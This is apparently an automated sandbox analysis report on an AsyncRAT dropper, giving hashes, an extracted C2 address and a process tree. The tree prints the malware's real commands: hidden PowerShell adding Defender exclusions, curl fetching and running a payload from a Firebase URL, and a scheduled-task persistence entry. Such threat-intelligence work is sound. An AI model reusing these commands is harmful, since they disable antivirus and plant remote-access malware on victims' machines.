asyncrat | 91a3b2c8074fe3cd2fc0ae4b8f244e244f54e5ed51018e1b3b61907a1f2f160b

Analysis

max time kernel
150s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
26-05-2024 01:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-26_871fa13b7d0843b7625ee3dc5f4fe4db_hiddentear.exe
Size

204KB
MD5

871fa13b7d0843b7625ee3dc5f4fe4db
SHA1

f22e5898e6bbb26c81aedda6bde0ba91959a19b8
SHA256

91a3b2c8074fe3cd2fc0ae4b8f244e244f54e5ed51018e1b3b61907a1f2f160b
SHA512

0112b413f06cf7a8d805c27f83c3a5d511db110ddd218ea7a175778d3bb73b1b7c49b8bf2c80bdef38abe5df7971c6a882251f44e0a57857f852583377604f79
SSDEEP

3072:SdFHdppuOf+wMSHjnywM0vY9t8Qkh+nWM+lmsolAIrRuw+mqv9j1MWLQryn:uFPMOf+wMAywM0EJksn1+lDAA1n

Score

10^/10

asyncrat default execution link pdf rat

Malware Config

Extracted

Family

asyncrat

Version

Venom Pwn3rzs' Edtition v6.0.1

Botnet

Default

65.2.185.165:4449

Mutex

threugritegfjfd

Attributes

delay
1
install
true
install_file
gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Program Files\hib.exe	family_asyncrat

Detects executables attemping to enumerate video devices using WMI 2 IoCs

Processes:

resource	yara_rule
C:\Program Files\hib.exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice
behavioral2/memory/4348-82-0x0000000000D40000-0x0000000000D58000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4148 powershell.exe
2804 powershell.exe
4148 powershell.exe
2804 powershell.exe
Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2024-05-26_871fa13b7d0843b7625ee3dc5f4fe4db_hiddentear.execmd.exehib.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	2024-05-26_871fa13b7d0843b7625ee3dc5f4fe4db_hiddentear.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	hib.exe

Executes dropped EXE 2 IoCs

Processes:

hib.exegturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe

pid process

4348 hib.exe
5280 gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
Drops file in Program Files directory 2 IoCs

Processes:

curl.execurl.exe

description ioc process

File created C:\Program Files\terms-of-appointment-of-id-bal.pdf curl.exe
File created C:\Program Files\hib.exe curl.exe

pid	process
4348	hib.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe

description	ioc	process
File created	C:\Program Files\terms-of-appointment-of-id-bal.pdf	curl.exe
File created	C:\Program Files\hib.exe	curl.exe

HTTP links in PDF interactive object 1 IoCs

Detects HTTP links in interactive objects within PDF files.

pdf link

Processes:

resource	yara_rule
C:\Program Files\terms-of-appointment-of-id-bal.pdf	pdf_with_link_action

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3588 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3112 timeout.exe

pid	process
3588	schtasks.exe

pid	process
3112	timeout.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings cmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exehib.exegturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe

pid	process
4148	powershell.exe
4148	powershell.exe
4148	powershell.exe
2804	powershell.exe
2804	powershell.exe
2804	powershell.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
4348	hib.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exehib.exegturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe

description	pid	process
Token: SeDebugPrivilege	4148	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	4348	hib.exe
Token: SeDebugPrivilege	5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

3888 AcroRd32.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

AcroRd32.exegturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe

pid process

3888 AcroRd32.exe
3888 AcroRd32.exe
3888 AcroRd32.exe
3888 AcroRd32.exe
5280 gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
3888 AcroRd32.exe

pid	process
3888	AcroRd32.exe

pid	process
3888	AcroRd32.exe
3888	AcroRd32.exe
3888	AcroRd32.exe
3888	AcroRd32.exe
5280	gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
3888	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-05-26_871fa13b7d0843b7625ee3dc5f4fe4db_hiddentear.execmd.exehib.execmd.execmd.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 4728 wrote to memory of 1848	4728	2024-05-26_871fa13b7d0843b7625ee3dc5f4fe4db_hiddentear.exe	cmd.exe
PID 4728 wrote to memory of 1848	4728	2024-05-26_871fa13b7d0843b7625ee3dc5f4fe4db_hiddentear.exe	cmd.exe
PID 4728 wrote to memory of 1848	4728	2024-05-26_871fa13b7d0843b7625ee3dc5f4fe4db_hiddentear.exe	cmd.exe
PID 1848 wrote to memory of 1484	1848	cmd.exe	mode.com
PID 1848 wrote to memory of 1484	1848	cmd.exe	mode.com
PID 1848 wrote to memory of 1484	1848	cmd.exe	mode.com
PID 1848 wrote to memory of 4148	1848	cmd.exe	powershell.exe
PID 1848 wrote to memory of 4148	1848	cmd.exe	powershell.exe
PID 1848 wrote to memory of 4148	1848	cmd.exe	powershell.exe
PID 1848 wrote to memory of 2804	1848	cmd.exe	powershell.exe
PID 1848 wrote to memory of 2804	1848	cmd.exe	powershell.exe
PID 1848 wrote to memory of 2804	1848	cmd.exe	powershell.exe
PID 1848 wrote to memory of 4688	1848	cmd.exe	curl.exe
PID 1848 wrote to memory of 4688	1848	cmd.exe	curl.exe
PID 1848 wrote to memory of 4688	1848	cmd.exe	curl.exe
PID 1848 wrote to memory of 3888	1848	cmd.exe	AcroRd32.exe
PID 1848 wrote to memory of 3888	1848	cmd.exe	AcroRd32.exe
PID 1848 wrote to memory of 3888	1848	cmd.exe	AcroRd32.exe
PID 1848 wrote to memory of 1572	1848	cmd.exe	curl.exe
PID 1848 wrote to memory of 1572	1848	cmd.exe	curl.exe
PID 1848 wrote to memory of 1572	1848	cmd.exe	curl.exe
PID 1848 wrote to memory of 4348	1848	cmd.exe	hib.exe
PID 1848 wrote to memory of 4348	1848	cmd.exe	hib.exe
PID 4348 wrote to memory of 5008	4348	hib.exe	cmd.exe
PID 4348 wrote to memory of 5008	4348	hib.exe	cmd.exe
PID 4348 wrote to memory of 1956	4348	hib.exe	cmd.exe
PID 4348 wrote to memory of 1956	4348	hib.exe	cmd.exe
PID 1956 wrote to memory of 3112	1956	cmd.exe	timeout.exe
PID 1956 wrote to memory of 3112	1956	cmd.exe	timeout.exe
PID 5008 wrote to memory of 3588	5008	cmd.exe	schtasks.exe
PID 5008 wrote to memory of 3588	5008	cmd.exe	schtasks.exe
PID 3888 wrote to memory of 5072	3888	AcroRd32.exe	RdrCEF.exe
PID 3888 wrote to memory of 5072	3888	AcroRd32.exe	RdrCEF.exe
PID 3888 wrote to memory of 5072	3888	AcroRd32.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe
PID 5072 wrote to memory of 1848	5072	RdrCEF.exe	RdrCEF.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2024-05-26_871fa13b7d0843b7625ee3dc5f4fe4db_hiddentear.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-26_871fa13b7d0843b7625ee3dc5f4fe4db_hiddentear.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zSDFD1.tmp\pdf.bat" "
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1848
- - C:\Windows\SysWOW64\mode.com
    MODE CON COLS=100 LINES=1
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionPath "C:"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4148
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionExtension ".exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2804
- - C:\Windows\SysWOW64\curl.exe
    curl -o "C:\Program Files\terms-of-appointment-of-id-bal.pdf" "https://www.bajajauto.com/pdf/terms-of-appointment-of-id-bal.pdf"
    3⤵
    - Drops file in Program Files directory
    PID:4688
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Program Files\terms-of-appointment-of-id-bal.pdf"
    3⤵
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3888
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5072
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5E2A167879FABEAF4C43B782452EB969 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:1848
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=296E5D57AB463F875C55B8B02AB31B72 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=296E5D57AB463F875C55B8B02AB31B72 --renderer-client-id=2 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:4988
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E5355648FC77C7D889297868B52745A0 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:2124
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DA05BFF9EF811CFA5D71D78BB71FABA0 --mojo-platform-channel-handle=1948 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:1268
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=AC1A5B03F65A192A75BB5664A0827DDC --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=AC1A5B03F65A192A75BB5664A0827DDC --renderer-client-id=6 --mojo-platform-channel-handle=2352 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:4356
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DE36B65F8EC282F8B483FC386753C79F --mojo-platform-channel-handle=2884 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:5168
- - C:\Windows\SysWOW64\curl.exe
    curl -o "C:\Program Files\hib.exe" "https://firebasestorage.googleapis.com/v0/b/windows-b5e31.appspot.com/o/hib.exe?alt=media&token=be1aa45d-72f3-44cc-bedc-b7e602a23d31&_gl=1*7lg83p*_ga*MTQwNjQ4OTYyNi4xNjgxNjM1NDg5*_ga_CW55HF8NVT*MTY4NjMxNjIyNi4xNi4xLjE2ODYzMTYyNDMuMC4wLjA."
    3⤵
    - Drops file in Program Files directory
    PID:1572
- - C:\Program Files\hib.exe
    "C:\Program Files\hib.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4348
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu" /tr '"C:\Users\Admin\AppData\Roaming\gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe"' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5008
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu" /tr '"C:\Users\Admin\AppData\Roaming\gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:3588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEB1.tmp.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1956
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:3112
    - - C:\Users\Admin\AppData\Roaming\gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe
        
        "C:\Users\Admin\AppData\Roaming\gturjdysfuidjsjttsydjstta se fukofuhddjjfidsu.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:5280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4080,i,5711962389779687290,1245653010537220991,262144 --variations-seed-version --mojo-platform-channel-handle=3772 /prefetch:8
1⤵
PID:1492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

